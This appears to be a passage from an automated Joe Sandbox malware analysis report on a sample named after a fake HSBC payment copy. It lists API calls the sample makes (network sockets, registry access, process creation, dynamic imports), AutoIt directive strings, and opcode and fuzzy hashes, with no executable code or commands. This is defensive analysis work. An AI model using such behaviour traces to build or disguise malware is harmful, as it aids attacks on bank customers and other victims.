                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                • Opcode ID: 01e544deec5187832cd4231942e8e198a3d26dd562ab5ed6b5814c1133cb42c3
                                                                                                                                • Instruction ID: 5dd0ab784a5db7ec7a8db530742645680e7bee0c7f6e22a1702247ff79ae5b93
                                                                                                                                • Opcode Fuzzy Hash: 01e544deec5187832cd4231942e8e198a3d26dd562ab5ed6b5814c1133cb42c3
                                                                                                                                • Instruction Fuzzy Hash: E0313138640284EFDB20CF58DC84F5937E1FB8A714F1982A8F6118F2B2CB79A8419B55
                                                                                                                                APIs
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DB2E
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DB54
                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0077DB57
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0077DB75
                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0077DB7E
                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0077DBA3
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0077DBB1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                • Opcode ID: d2299d3419fef8b4e97fa0cdb0d9e9f057a732746f5764a9b01acbc97b547dd7
                                                                                                                                • Instruction ID: b641803902164050ff577e65dabd9f07495fdc49f438dc17a024464cb5161da9
                                                                                                                                • Opcode Fuzzy Hash: d2299d3419fef8b4e97fa0cdb0d9e9f057a732746f5764a9b01acbc97b547dd7
                                                                                                                                • Instruction Fuzzy Hash: 51218676600219AFDF20DFB8DC48CBB73ACEF493A0B01C525F918DB160D6789C4187A4
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00797D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00797DB6
                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007961C6
                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 007961D5
                                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0079620E
                                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00796217
                                                                                                                                • WSAGetLastError.WSOCK32 ref: 00796221
                                                                                                                                • closesocket.WSOCK32(00000000), ref: 0079624A
                                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00796263
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 910771015-0
                                                                                                                                • Opcode ID: 64fad1f2e7580eec0544b961823e8f91c86cd5e0a85d1fc1f9f8a7a20037f3b1
                                                                                                                                • Instruction ID: bfe2b0083a91c01b632281c2b438dce5cf4e8282c0b12f39cb723aae090119de
                                                                                                                                • Opcode Fuzzy Hash: 64fad1f2e7580eec0544b961823e8f91c86cd5e0a85d1fc1f9f8a7a20037f3b1
                                                                                                                                • Instruction Fuzzy Hash: 6331B371600118AFDF10AF64EC89BBE77ADEF45760F048129FD05A7291DB78AC04CBA1
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                                • Opcode ID: 06dce37e936c5d052e1ed52b41970575bbbc8663ed9a044d1249fb2483399985
                                                                                                                                • Instruction ID: 60a2c8e483ab123099398b258f57e9f562574b4db732fb91782788af383c5552
                                                                                                                                • Opcode Fuzzy Hash: 06dce37e936c5d052e1ed52b41970575bbbc8663ed9a044d1249fb2483399985
                                                                                                                                • Instruction Fuzzy Hash: A22179B2204111E6DA25B634AE06FA773D8DF55390F50C039F88DC7092EB6C9D42C2D4
                                                                                                                                APIs
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DC09
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0077DC2F
                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0077DC32
                                                                                                                                • SysAllocString.OLEAUT32 ref: 0077DC53
                                                                                                                                • SysFreeString.OLEAUT32 ref: 0077DC5C
                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0077DC76
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0077DC84
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                • Opcode ID: 3495b843004ef29f6d4ebc1e5b34092ec250d292353ec1a472a8a73041a2f9ce
                                                                                                                                • Instruction ID: 277564f49823d7aee625718a6259428beeaadf088035af7e811cf1a6177b1ca8
                                                                                                                                • Opcode Fuzzy Hash: 3495b843004ef29f6d4ebc1e5b34092ec250d292353ec1a472a8a73041a2f9ce
                                                                                                                                • Instruction Fuzzy Hash: 0C211275604214AF9F219BF8DC89DAB77ACEF49360B10C135F919CB261D678DC41CB64
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00721D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00721D73
                                                                                                                                  • Part of subcall function 00721D35: GetStockObject.GDI32(00000011), ref: 00721D87
                                                                                                                                  • Part of subcall function 00721D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00721D91
                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007A7632
                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007A763F
                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007A764A
                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007A7659
                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007A7665
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                • Opcode ID: 65fab7808e30b9b6e44f6c235b63c116f5ad26322bb35de88154aeddcae3888b
                                                                                                                                • Instruction ID: 3852faff23249a436c03268caaf2e7cf154615231afba9b84cd472ddb66f21c9
                                                                                                                                • Opcode Fuzzy Hash: 65fab7808e30b9b6e44f6c235b63c116f5ad26322bb35de88154aeddcae3888b
                                                                                                                                • Instruction Fuzzy Hash: F311B2B2110219BFEF158F64CC85EE77F6DEF49798F014215FA04A60A0CA76AC21DBA4
                                                                                                                                APIs
                                                                                                                                • __init_pointers.LIBCMT ref: 00749AE6
                                                                                                                                  • Part of subcall function 00743187: EncodePointer.KERNEL32(00000000), ref: 0074318A
                                                                                                                                  • Part of subcall function 00743187: __initp_misc_winsig.LIBCMT ref: 007431A5
                                                                                                                                  • Part of subcall function 00743187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00749EA0
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00749EB4
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00749EC7
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00749EDA
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00749EED
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00749F00
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00749F13
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00749F26
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00749F39
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00749F4C
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00749F5F
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00749F72
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00749F85
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00749F98
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00749FAB
                                                                                                                                  • Part of subcall function 00743187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00749FBE
                                                                                                                                • __mtinitlocks.LIBCMT ref: 00749AEB
                                                                                                                                • __mtterm.LIBCMT ref: 00749AF4
                                                                                                                                  • Part of subcall function 00749B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00749AF9,00747CD0,007DA0B8,00000014), ref: 00749C56
                                                                                                                                  • Part of subcall function 00749B5C: _free.LIBCMT ref: 00749C5D
                                                                                                                                  • Part of subcall function 00749B5C: DeleteCriticalSection.KERNEL32(02~,?,?,00749AF9,00747CD0,007DA0B8,00000014), ref: 00749C7F
                                                                                                                                • __calloc_crt.LIBCMT ref: 00749B19
                                                                                                                                • __initptd.LIBCMT ref: 00749B3B
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00749B42
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3567560977-0
                                                                                                                                • Opcode ID: 7a2d0d902e7cc3fe9ef63ec96a467f557ac6ecf63b865970b1c46b280dad75db
                                                                                                                                • Instruction ID: 82e388172150b0d97ebe81c8006d85c493fc4897112a783b5bc8ca7f64d5ffbb
                                                                                                                                • Opcode Fuzzy Hash: 7a2d0d902e7cc3fe9ef63ec96a467f557ac6ecf63b865970b1c46b280dad75db
                                                                                                                                • Instruction Fuzzy Hash: 2DF0B47270A711AAE635B774BC0BA4B37E4DF02734F218A1AF764C50D2FF2C984189A5
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 007AB644
                                                                                                                                • _memset.LIBCMT ref: 007AB653
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007E6F20,007E6F64), ref: 007AB682
                                                                                                                                • CloseHandle.KERNEL32 ref: 007AB694
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                • String ID: o~$do~
                                                                                                                                • API String ID: 3277943733-3636950277
                                                                                                                                • Opcode ID: dd84b28f2611d98319d84967e8f9e80ddd09df290b362f3643e82b7220d4b02d
                                                                                                                                • Instruction ID: 28e62d952fc382be5ffb19b7c5bcf060dfaff514b25befc68309fd05d07321f3
                                                                                                                                • Opcode Fuzzy Hash: dd84b28f2611d98319d84967e8f9e80ddd09df290b362f3643e82b7220d4b02d
                                                                                                                                • Instruction Fuzzy Hash: 8EF0FEB2641344BAE7102765BC4AFBB7A9CEB1D7D5F408031FA08E9192D77D5C108BAC
                                                                                                                                APIs
                                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00743F85), ref: 00744085
                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0074408C
                                                                                                                                • EncodePointer.KERNEL32(00000000), ref: 00744097
                                                                                                                                • DecodePointer.KERNEL32(00743F85), ref: 007440B2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                                • API String ID: 3489934621-2819208100
                                                                                                                                • Opcode ID: 957880e74f26123dc9c805e8289386c845beabf4107745db5950744b992e22f7
                                                                                                                                • Instruction ID: c5c1417c43a1ee527cc30b3cb879a553e36183e846ee53e1caed3846a5283894
                                                                                                                                • Opcode Fuzzy Hash: 957880e74f26123dc9c805e8289386c845beabf4107745db5950744b992e22f7
                                                                                                                                • Instruction Fuzzy Hash: 29E0BF70642744EFDB10AFA2EC4DB453AA4B759742F10C56CF101E60B0CB7E4600DA1D
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove$__itow__swprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3253778849-0
                                                                                                                                • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                                                                • Instruction ID: 34e4fbedb0c302cc1c9f356eb3c8764575a7db2477aec1fa0d1b89d86cfe1dbd
                                                                                                                                • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                                                                                                • Instruction Fuzzy Hash: 75617E3064066AEBCF05FF60DC89EFE37A5AF05304F084559F9555B292EB38D915CB90
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22
                                                                                                                                  • Part of subcall function 007A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31
                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A02BD
                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007A02FD
                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007A0320
                                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007A0349
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 007A038C
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 007A0399
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4046560759-0
                                                                                                                                • Opcode ID: 1a3fcf4536174728860fe0b9c3f1413430798523c4bb43c7d51e760761e8c12e
                                                                                                                                • Instruction ID: 5f23c7fe3b3a15526fe3480bd6f64d8128b87d31d94affe7c2061f0c9023aa6f
                                                                                                                                • Opcode Fuzzy Hash: 1a3fcf4536174728860fe0b9c3f1413430798523c4bb43c7d51e760761e8c12e
                                                                                                                                • Instruction Fuzzy Hash: C8513B71108200EFCB14EF64D849E6BBBE9FF85314F04491DF595872A1DB39E905CB92
                                                                                                                                APIs
                                                                                                                                • GetMenu.USER32(?), ref: 007A57FB
                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 007A5832
                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007A585A
                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 007A58C9
                                                                                                                                • GetSubMenu.USER32(?,?), ref: 007A58D7
                                                                                                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 007A5928
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 650687236-0
                                                                                                                                • Opcode ID: d3c28e983410499711435085a9c73c281ba856b95a45f07df04bb45db9f21e6d
                                                                                                                                • Instruction ID: de5debc8e2e54a7f667d05e26f7fb134c2b14d6f1e60fd3ce5bfce4dc95f073f
                                                                                                                                • Opcode Fuzzy Hash: d3c28e983410499711435085a9c73c281ba856b95a45f07df04bb45db9f21e6d
                                                                                                                                • Instruction Fuzzy Hash: EB518E35E00625EFCF05EFA4C845AAEB7B4EF89320F144169E901BB351CB38AE41CB90
                                                                                                                                APIs
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 0077EF06
                                                                                                                                • VariantClear.OLEAUT32(00000013), ref: 0077EF78
                                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0077EFD3
                                                                                                                                • _memmove.LIBCMT ref: 0077EFFD
                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0077F04A
                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0077F078
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1101466143-0
                                                                                                                                • Opcode ID: 58b98edaef4f30951767471ca9eb070f79509bdba388419d8d3868881f12cc15
                                                                                                                                • Instruction ID: 940c43def439863e8046c5c1d470462b1f4a924d74a46a3be2910bc7e359d766
                                                                                                                                • Opcode Fuzzy Hash: 58b98edaef4f30951767471ca9eb070f79509bdba388419d8d3868881f12cc15
                                                                                                                                • Instruction Fuzzy Hash: 3D516AB5A00209EFCB14DF58C884AAAB7B8FF4D354B158569ED59DB301E338E911CFA0
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00782258
                                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007822A3
                                                                                                                                • IsMenu.USER32(00000000), ref: 007822C3
                                                                                                                                • CreatePopupMenu.USER32 ref: 007822F7
                                                                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00782355
                                                                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00782386
                                                                                                                                Memory Dump Source
